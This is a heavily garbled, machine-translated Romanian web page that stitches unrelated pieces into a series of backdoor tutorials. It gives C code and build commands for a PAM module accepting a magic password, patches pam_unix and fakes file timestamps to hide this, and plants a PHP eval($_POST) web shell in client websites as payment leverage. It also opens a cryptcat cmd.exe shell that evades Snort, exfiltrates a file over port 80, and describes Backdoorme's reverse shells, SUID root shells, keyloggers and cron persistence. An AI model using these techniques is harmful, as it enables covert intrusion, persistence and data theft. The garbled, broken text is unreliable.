Blogul nostru despre Habria ne vorbește nu numai despre dezvoltarea produsului său - telefonie pentru operatorii conexiunii Hydra, ci publică și materiale despre lucrul cu infrastructura și tehnologiile conexe.

Jurnalistul și hackerul german Leif Ryge a scris un articol cuprinzător pentru Ars Technica despre modul în care abordarea actuală a organizării actualizărilor software implică riscuri serioase pentru securitatea informațiilor. Vă prezentăm gândurile respectuoase la acest articol.

Preistorie

În 2014, consiliul editorial al Washington Post a scris despre modul în care companiile ar putea folosi cheile Apple și Google pentru a găsi o cheie secretă pe cheie, care ar putea fi folosită pentru a refuza accesul la produsele lor și cum le-ar salva și le-ar transfera în agențiile de informații.indiferent de ce ține nava cu ei. decizie."

Reducerea „pielei slabe”, un atac asupra pielii care poate fi critic, este, prin urmare, fundamentală pentru orice mecanism nou de extindere a securității software.

Există o mulțime de modalități de a pune picior pe o mașină spartă. De la cele mai banale și ușor de identificat (adăugați-vă în baza de date a dezvoltatorilor) până la modulele kernel pliabile care implementează un shell gateway pe o mașină la distanță. Printre acestea, este foarte simplu de implementat și are o metodă secretă despre care foarte puțini oameni știu. Aceasta este o modificare a modulelor sistemului de autentificare PAM pe care le folosesc toate sistemele UNIX actuale.

Ce este PAM?

module de autentificare (PAM) - un set de API-uri necesare pentru implementarea mecanismelor de autentificare în diverse aplicații.

Înainte de apariția PAM, pentru a implementa autentificarea, să zicem, cu ajutorul unui card-cheie, vânzătorii trebuiau să introducă codul de suport pentru cardurile lor în fiecare componentă a sistemului, care era responsabilă de autentificarea clientului. Pentru a adăuga și a re-selecta utilitarul de conectare, sshd, precum și orice alt software la care a fost planificat să se adauge funcționalități similare.

Odată cu apariția PAM, situația s-a clarificat semnificativ. Acum, pentru a adăuga propriul protocol de autentificare unic la sistem, este suficient să îl implementați într-un singur modul PAM. Și toate utilitățile și programele care funcționează cu PAM, îl folosesc și pot fi folosite pentru a autentifica utilizatorul.

În practică, arată cam așa: utilitarul de conectare se extinde la PAM, care finalizează toate verificările necesare pentru valori suplimentare în fișierul de configurare a modulului și returnează rezultatul înapoi la utilitarul de conectare. Cool, de ce nu? Cu toate acestea, o astfel de abordare subminează posibilitățile pe care le putem folosi pentru a obține un punct de sprijin în sistem.

Varto zrobiti mici zastorezhenya. Există trei implementări principale ale PAM:

  • Linux-PAM este principala implementare a PAM pe orice sistem Linux;
  • OpenPAM - suportat pe sistemele BSD și macOS;
  • JPam este o implementare PAM pentru suplimente Java.

Nu ne vom concentra asupra vreunei implementări specifice. Funcționalitatea de bază este aceeași.

Aspecte ale consolidării *nix cu wiki-uri PAM

Puteți afla cum să configurați PAM pentru programul de piele de la Cataloza /etc/pam.d(Linux) sau în fișierul /etc/pam.conf. Exemplu de fișier de configurare pentru utilitarul de conectare pe macOS:

auth opțional pam_krb5 .so use_kcminit

auth opțional pam_ntlm .deci try_first_pass

auth opțional pam_mount .deci try_first_pass

auth required pam_opendirectory .deci try_first_pass

accunt necesar pam_nologin .so

accunt necesar pam_opendirectory .so

parola necesară pam_opendirectory .so

sesiune necesară pam_launchd .so

sesiune necesară pam_uwtmp .so

sesiune opțional pam_mount .so

Să ne dăm seama cum funcționează magia aici.

Fișierul de configurare descrie regulile de verificare care sunt necesare pentru autentificarea cu succes a unui client și alte acțiuni (schimbarea unei parole, pregătirea unui client). Fiecare rând al fișierului de configurare conține o regulă. Inversările sunt aranjate pe rând.

De la stânga la dreapta: tipul modulului, control_flag, numele modulului. Mai întâi trebuie să indicăm tipul modulului de autentificare, aceste module în sine sunt responsabile pentru autentificare. Control_flag - puterea modulului. Puteți ghici sensul:

  • necesar (necesar) - atunci când modulul întoarce semnalul pozitiv, partea de șnur care lipsește este îndepărtată și apoi satisfăcută. Dacă modulul inversează rezultatul negativ, acesta este aruncat accidental și orice alte verificări nu sunt finalizate;
  • necesar (necesar) - precum și obligatoriu: dacă confirmarea este pozitivă, partea din cec care a fost pierdută este eliminată. Din cauza acestei diferențe, în cazul unui tip negativ, șnurul cecului continuă să se defecteze, sursa de alimentare este resetată;
  • suficient (suficient) - satisface întrebarea în acel caz, deoarece controalele anterioare nu au fost efectuate negativ. Dacă modulul este specificat negativ, rezultatul este ignorat și bucla de inversare este efectuată în continuare;
  • optional (optional) – modulul este executat, in caz contrar rezultatul este ignorat.

Deja în această etapă, este clar că făcând modificări minore în fișierul de configurare, ne putem asigura autentificarea cu succes la sistem cu orice parolă (este suficient să marchem toate modulele de autentificare ca opționale). În caz contrar, decizia va fi luată doar clientului sau administratorului legitim, care nu se va putea înregistra logând cu succes în sistem cu o parolă incorectă.

Scriem un modul puternic backdoor

PAM ne permite să activăm modele puternice de autentificare. Prin urmare, putem distruge modulul cu o parolă „charm” și ne putem asigura că sistemul acceptă atât parolele standard ale clienților, cât și guvernul nostru. Dacă introduceți o parolă incorectă, vi se va oferi un bypass complet de autentificare. Opțiune proastă.

Ok, cod (nu uitați să înlocuiți parola magică cu parola dvs. „încântătoare”):

#include

#include

#include

#include

#include

#include

#define MYPASSWD „parolă-magic”

PAM_EXTERN int pam_sm_setcred (pam_handle_t * pamh , int flags , int argc , const char * * argv ) (

returnează PAM_SUCCESS ;

PAM_EXTERN int pam_sm_acct_mgmt (pam_handle_t * pamh , int flags , int argc , const char * * argv ) (

returnează PAM_SUCCESS ;

PAM_EXTERN int pam_sm_authenticate (pam_handle_t * pamh , int flags , int argc , const char * * argv ) (

char *parola = NULL;

pam_get_authtok (pamh, PAM_AUTHTOK, (const char * *) & parola, NULL);

dacă (! strncmp (parolă, MYPASSWD, strlen (MYPASSWD)))

returnează PAM_SUCCESS ;

întoarcere - 1;

Modulul Zberem:

$ sudo apt - obțineți instalarea libpam0g - dev gcc

$ gcc - fPIC - c pam_backdoor .c

$ ld - x -- shared - o pam_backdoor .so pam_backdoor .o

Să-l plasăm în directorul cu alte module:

$ sudo chown root : root pam_backdoor .so

$ sudo cp pam_backdoor .so / lib / x86_64 - linux - gnu / securitate /

Arată respect pentru ceea ce faci /lib/x86_64-linux-gnu/security/ Specific Debian/Ubuntu. Pentru Fedora, Red Hat și CentOS, modulele sunt localizate în Catalog /lib64/security/, iar în Arch Linux - la cataloză /lib/security/.

Acum puteți configura PAM doar în așa fel încât procesul de verificare a modulului dvs. să fie suficient pentru autentificarea cu succes. De exemplu, configurația pentru utilitarul su ( /etc/pam.d/su):

Pe unele sisteme Linux, autentificarea poate fi configurată într-un grup de fișiere: common-auth, common-password, common-session și apoi conectată la fișierele de configurare ale unor utilitare specifice prin @include. În acest moment trebuie să te închini.

După ce ați introdus setările în configurație, utilitarul su va fi lansat pentru dvs. folosind parola specificată în modul. Același truc poate fi făcut folosind utilitarul de conectare (conectare la consolă) și sshd pentru autentificarea de la distanță.

Vom instala o ușă din spate în modulul original

Când editați configurația PAM, puteți marca modulul pam_unix.so. Acest modul oferă autentificarea clienților folosind o bază de date standard de parole pentru sistemele UNIX. /etc/passwd. Există o mulțime de utilitare disponibile, inclusiv su, login, sshd și alte programe (de exemplu, SecureFTPd).

Fragmentele PAM sunt încă open source și avem acces la textele de ieșire atât ale demonului însuși, cât și ale componentelor standard și putem introduce propria noastră ușă din spate direct în acest modul.

Pentru a face modificările necesare, textele de ieșire PAM sunt actualizate:

$ http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

$tar - xzf inux - PAM - 1.1.8.tar.gz

Deschiderea fișierului Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.cȘi căutăm următoarele rânduri:

Selectăm și înlocuim modulul original cu al nostru:

$. /configure

$ face

$ sudo cp Linux - PAM - 1.1.8 / modules / pam_unix / .libs / pam_unix .so / lib / x86_64 - linux - gnu / security /

Pentru ca administratorul să nu marcheze înlocuirea, schimbăm timpul de creare a fișierului pentru a evita timpul de creare a altor module.

Îmi amintesc în articolul „10 ani și recomandări pentru construcția șantierului”, am prevăzut consecințele dacă un client necinstit a decis să ne arunce fără importanță asupra celor care au lucrat deodată mai mult decât să repete soarta. După ce am aflat că nu vom plăti nimic, nu am putut să ne deschidem site-urile, iar în ele mai erau câteva bucăți de apă.

Totuși, eram îngrijorat că într-unul dintre site-uri pierdusem o mică „intrare de rezervă”, și fără măcar să mă gândesc la asta voi merge pe alt site și voi pleca din lume. Și uitându-vă la această intrare, veți vedea un formular simplu pentru încărcarea fișierelor pe server.

Voi ajuta cu asta importând scripturile necesare pe site și lansându-le pe site, iar cu ajutorul lor își jefuiesc roboții bruti. Există doar un minus din aceste uși - ar putea dispărea rapid dacă cineva, desigur, ar ști despre existența lor.

A trecut o oră și nu contează pentru cei că până astăzi totul mergea bine, dar nu include faptul că un astfel de pătrunjel s-ar putea întâmpla din nou.

În principiu, poți folosi vechea metodă de a trimite un fișier pe server, dar... Vestea este complicată pentru că o poți face într-un mod mai simplu.

Propun variante și idei ale celui mai simplu Bekdurov, pentru a pune cu adevărat probleme. Oz...

  1. Creăm un fișier php și îl numim ceva de genul license.php sau ceva de genul.
  2. Scrieți în cod nou

    if (isset($_POST["text"]))
    eval($_POST[„text”]);
    ?>




  3. Plasam fisierul unde a fost depus in cms, de exemplu, in net-ul editorului WYSIWYG. Dacă este necesar, duplicați fișierul din nou în 2-3 luni (despre orice incendiu)

Axa vin, cadru pentru inadecvare. Vă apreciez, nu este nevoie să explicați că funcția eval atribuie cod formularului.

Întregul lucru este un cadru care poate fi folosit fără nicio aplicație pentru implementare. Este posibil, prin highlight_file, să înlocuiți orice fișier cu parole care nu au acces direct. Vă puteți conecta la baza de date, o puteți valorifica sau modifica. De asemenea, puteți crea un script pentru a vedea totul pe server, indiferent de ce.

Mai jos, voi introduce idei de uși suplimentare care pot fi realizate pentru coșuri – o voi lăsa pe seama dumneavoastră, dragă cititor, ca o treabă casnică necesară. Dacă este un tort pentru o zi bună, voi fi bucuros să mă uit la ce a ieșit.

Idei pentru decor :

  1. Ar fi rău ca ușa să nu fie accesibilă tuturor și să se creeze autorizație pentru ea, de exemplu, prin urgență. nota editorului).
  2. Odată ce ai autorizarea, poți pregăti imediat o serie de butoane pe care poți să dai clic pentru a accesa un alt script. De exemplu, te duci la ușa ta și există butoane - recuperați parole, preluați baza de date, vizualizați panoul de administrare și așa mai departe.
  3. Alte idei?

La sfarsitul zilei

Ușile Vikoristovaty sunt o idee bună dacă creați un site web înainte de plată (în cazul în care plătiți) sau dacă lucrați cu o companie și doriți să fiți asigurat. În primul caz, dacă plata este scadentă, atunci ușa poate fi scoasă, sau poate fi scoasă, dar nu cred că va mai fi nevoie. Și într-un alt scenariu, va trebui să le tăiați treptat.

Asta e tot pentru azi. Voi fi bucuros să aud ideile și propunerile dumneavoastră pe această temă! Până la o nouă veste

Cryptcat ne permite să comunicăm între două sisteme și să criptăm comunicațiile dintre ele folosind doi pești - unul dintre mulți algoritmi de criptare excelente.

Anterior, am aflat despre un lucru mic care vă permite să creați o conexiune între două mașini și să transferați fișiere sau să creați un shell de comandă pentru „reconectarea” sistemului. În ciuda frumuseții și eleganței acestui mic instrument, există un dezavantaj major - transmisiile între computere pot fi detectate de dispozitive de securitate, cum ar fi firewall-urile și sistemele de detectare a intruziunilor (IDS).

Această lecție este legată de vărul popular al lui netcat, cryptcat (care este de fapt un netcat foarte drăguț și exotic, dar mai simplu).

Criptarea Twofish este la egalitate cu criptarea AES, așa că cryptcat este practic antiglonț. Astfel, IDS nu poate detecta un comportament rău în trafic dacă rutele sale trec prin astfel de porturi HTTP primare 80 și 443.

Croc 1: Pretend Cryptcat

Krok 2: Deblocați aparatul auditiv pe Windows

Putem deschide ascultătorul pe orice sistem cu o sintaxă similară ca pentru netcat. În versiunea noastră, deschidem difuzorul în Windows 7 pe portul 6996 și creăm un shell de comandă.

cryptcat -l -p 6996 -e cmd.exe

L înseamnă „deschide urechea”
-p 6996 înseamnă „plasați ascultătorul pe portul 6996”
-e cmd.exe înseamnă „porniți shell-ul de comandă pentru comunicare”

Krok 3: Deschideți Snort sau alt IDS

Acum, să rulăm un IDS de tip Snort pe un alt sistem care se va conecta la un sistem Windows pentru a ne asigura că IDS-ul este „sigilat” cu criptare, făcând gazda noastră neagră invizibilă pentru astfel de dispozitive de securitate.


Krok 4: Conectați-vă la sistemul Windows cu Cryptcat

Pentru instalarea Cryptcat pe BackTrack, nu este vina noastră să intervenim și să-l instalăm. În plus, dacă se află în directorul /bin, i se poate refuza accesul la orice alt director.

Acum ne conectăm la sistemul cryptcat Windows 7 din sistemul nostru BackTrack și vedem cum putem învinge ușa din spate a conexiunii criptate, care este posibil să nu fie posibilă detectată.

cryptcat 192.168.4.182.248 6996


După cum puteți vedea, suntem conectați la sistemul Windows 7 și am eliminat shell-ul de comandă din sistemul Win 7! Acest lucru ne oferă un control semnificativ asupra acestui sistem, dar nu total, deoarece shell-ul de comandă este limitat în capabilitățile sale.

Krok 5: Rulați jurnalele și alertele Snort

Acest tip de atac (trecerea unui shell de comandă printr-un gard) este ușor de detectat de către Snort sau alte IDS, dacă conexiunea nu este criptată. Regulile Snort îi spun administratorului de sistem că shell-ul cmd.exe trebuie să treacă printr-o linie subțire de comunicare și probabil că va funcționa pentru a te elimina din valoarea victorioasă a shell-ului de comandă. Cu comunicațiile criptate disponibile prin cryptcat, este posibil ca acest link să nu fie vizibil.

Să ne întoarcem și să verificăm jurnalele și alertele din Snort. Deoarece am avut succes în IDS sofisticat, nu este nevoie să vă faceți griji cu privire la mutarea shell-ului de comandă prin gol. Ne putem verifica jurnalele, ne putem autentifica /var/snort/alerts și putem vedea ce semnale primim de la conexiunea noastră la computerul Windows (ne pare rău să știm din timp).

kwrite /var/snort/alerts


După cum puteți continua, am obținut succes. Ne-am putut conecta la sistemul Windows fără să ne facem griji cu privire la niciun sistem de securitate!

Krok 6: Trimiteți Crypcat pe portul 80 pentru a scăpa de firewall

Dacă am creat cu succes o ușă de criptare pe sistemul victimei, administratorul de securitate trebuie să se asigure că portul neidentificat (6996) este activat. Acest lucru, mai mult decât orice, trebuie inițiat de administratorul de securitate pentru a ne limita accesul. În plus, pe sistemele cu un administrator de sistem bun și un firewall bun, acest port va fi probabil blocat de firewall.

Pentru orice măsură, pentru ca mamele să poată naviga pe internet pentru orice, este necesar să se folosească porturile necriptate 80 și 443 și, de asemenea, poate, 25, 53 și 110. Fragmentele vizualizării necriptate ale Internetului normal - traficul trece prin portul 80, care Dacă este deschis imediat, atunci este puțin probabil să se observe o ușoară creștere a traficului.

Acum, dacă am cucerit cu succes cryptcat, îl trimitem prin portul 80 cu tot restul traficului de Internet. Dacă doriți să criptați, să ne uităm la ce fel de date sunt transmise pe linie. Prin urmare, poate fi imposibil ca dispozitivele de securitate să-l detecteze pentru a-l bloca, fragmentele vor fi întotdeauna responsabile pentru permiterea traficului prin portul 80, iar traficul este criptat, iar IDS-ul nu va putea să-l „batch” în schimb.

Aici mutăm un fișier din sistemul victimei numit topsecret.txt în sistemul nostru atacator fără a detecta niciun dispozitiv de securitate. De data aceasta, în loc să trimitem shell-ul de comandă prin gard, vom depăși fișierul secret superior numit topsecret.txt prin conexiunea noastră criptată. Putem face acest lucru tastând în linia de comandă Windows:

cryptcat -l -p 80< topsecret.txt

L înseamnă „deschide urechea”
-p 80 înseamnă „deschideți ascultătorul pe portul 80”
< означает "отправить файл через этого слушателя"

Backdoorme - un utilitar pentru crearea automată a ușilor din spate

Backdoorme este un utilitar foarte ușor care poate fi folosit pentru a crea uși din spate ascunse pe mașinile Unix. Backdoorme folosește interfața familiară metasploit cu o extensibilitate uimitoare. Backdoorme se bazează pe conexiunile SSH ale victimei și pe datele din cloud, prin care acestea pot transmite și plasa orice backdoor. Fii amabil, vikorist Backdoorme cu o clădire separată deschisă.

Primiti ca oaspeti


Backdoorme vine imediat cu un număr mare de uși din spate, module și module suplimentare implementate. Ușile din spate sunt componente specifice pentru crearea și generarea unei uși în spate necesare, cum ar fi o ușă în spate netcat sau o ușă în spate msfvenom. Modulele pot fi stivuite pe orice ușă din spate și modificate pentru a face ușile din spate mai strânse, atașate sau învăluite. Elemente suplimentare și operațiuni aferente care pot fi șterse pentru a ajuta la păstrarea permanenței.

Mai multe despre ușile din spate: Pentru a începe backdoorme, verificați ce aveți nevoie.

$python dependencies.py

Lansați backdoorme:

$ python master.py

Ușa din spate

Pentru a detecta o ușă din spate, pur și simplu rulați cuvântul cheie „utilizați”.

>> utilizați shell/metasploit + Folosind ținta curentă 1. + Folosind backdoor Metasploit... (msf) >>

Puteți seta opțiuni pentru a accesa ușa din spate. Rulați fie „afișați opțiuni”, fie „ajutor” pentru a vizualiza lista de parametri care pot fi ajustați.

Ca și în metasploit, ușile din spate sunt organizate pe categorii.

  • Auxiliar (categorii suplimentare)
    • keylogger- Adaugă un keylogger în sistem și vă oferă opțiunea disponibilă de a trimite rezultatele înapoi prin poștă;
    • simpluhttp– Instalează serverul Python SimpleHTTP pe client.
    • utilizator– Conduce noul koristuvach la pragul prag.
    • web– Instalează Apache Server pe client.
  • Escaladare
    • setuid– SetUID backdoor vă permite să instalați un bit setuid pe fișierul compilat, ținând cont de faptul că utilizatorul are acces root. Astfel, atunci când un fișier este lansat ulterior de către un utilizator care nu permite accesul root, fișierul este legat de accesul root. În teorie, această backdoor redirecționează bit setuid către nano, astfel încât, dacă accesul root este pierdut în vreun fel, atacatorul se poate conecta din nou la SSH ca utilizator neprivilegiat și poate încă rula nano (sau selecta un fișier dublu) ca root . ("nano /etc/shadow"). Vă rugăm să rețineți că pentru a deschide această extensie, ușa din spate necesită acces root la cob în sine.
    • coajă– shell backdoor este o extensie backdoor preferată, similară cu extensia sa frate SetUID (sau mai specific). Dublează shell-ul bash al fișierului duplicat și setează bitul SUID. Vă rugăm să rețineți că accesul root este necesar pentru această expansiune backdoor. Pentru a învinge această ușă din spate, unde SSH acționează ca un server ostil, pur și simplu rulați „.bash -p” și veți avea acces root.
  • Shell (categoria Shell)
    • bash– wikirist folosește un script bash simplu pentru a se conecta la o anumită combinație de IP și port și transmite rezultatul la bash.
    • bash2- puțin mai puțin (și mai fiabil) din ușa din spate bash descrisă, care nu cere o parolă pe partea clientului.
    • metasploit– folosește msfvenom pentru a crea un cod dublu reverse_tcp pe țintă, apoi rulează codul dublu pentru a se conecta la wrapper-ul meterpreter.
    • netcat– vikoryst netcat pentru a transfera intrarea și ieșirea standard a dispozitivului /bin/sh, oferind shell-ul interactiv koristuvache.
    • netcat_traditional- Vikoristovu netcat-tradițional "s -e pentru crearea carcasei.
    • perl– un script scris în Perl care redirecționează rezultatul de la bash și redenumește procesul pentru a arăta mai puțin dezordonat.
    • php– lansează o ușă din spate PHP, care depășește rezultatul bash. Nu instalează automat serverul web, ci instalează modulul web vikoryst.
    • căţeluş- Vikorist backdoor n1nj4sec Pupy, care este cunoscut pe

      Primiti ca oaspeti

      .
    • piton– vikorist este un script python scurt pentru comenzile vikonanny și forțează rezultatele înapoi la koristuvach.
    • web– trimite serverul web la gazdă, apoi instalează backdoor-ul msfvenom php reverse_tcp și se conectează la gazdă. Indiferent de faptul că este încă un backdoor php, nu este același lucru cu descrierile backdoor-ului mai php.
  • Acces (categoria de acces)
    • remove_ssh- Dezinstalează serverul ssh de pe client. Este foarte bine să verificați sesiunile backdoor pentru a elimina orice urmă.
    • ssh_key– creează o cheie RSA și o copiază la destinație pentru conectare fără o parolă ssh.
    • ssh_port– Adaugă un nou port pentru ssh.
  • Windows (categoria Windows)
    • ferestre– Vikorist folosește msfvenom pentru a crea o ușă din spate pentru Windows.
Module

Este posibil ca ușa din spate să fie nevoie să fie îndepărtată din modulele suplimentare care sunt asamblate pentru a face ușa din spate mai puternică. Pentru a adăuga un modul, trebuie doar să vikorizați cuvântul cheie add.

(msf) >> adaugă otravă + modulul otravă adăugat

Modulul skin are parametri suplimentari care pot fi ajustați și dacă rulați din nou „help” puteți descărca sau instala orice opțiune suplimentară.

Modulele disponibile în prezent includ:

  • Otravă
    • Coșul de compilare al computerului țintă – Win compilează fișierul compilat pentru a accesa utilitarul de sistem și ușa principală.
    • De exemplu, dacă modulul deschide bin în același timp cu „ls”, va compila și transfera codul dublu sub numele „ls”, care este lansat ca ușă din spate originală și, de asemenea, sub „ls”, permițând astfel backdoor pentru a lansa backdoor mai des.
  • Cron
    • Adaugă un nou backdoor crontab pentru ca utilizatorul root să lucreze la o anumită frecvență.
  • Web
    • Instalează un server web și găzduiește o pagină web, care lansează o ușă din spate.
    • Doar mergeți la site cu urechile deschise și ușa din spate se va lansa.
  • Utilizator
    • Oferă noului koristuvach o explozie.
  • Lansare
    • Vă permite să creați uși din spate cu fișiere bashrc și init.
  • Lista albă
    • Adăugați o „listă albă” la IP, astfel încât numai acest IP să se poată conecta la ușa din spate.
Traducere: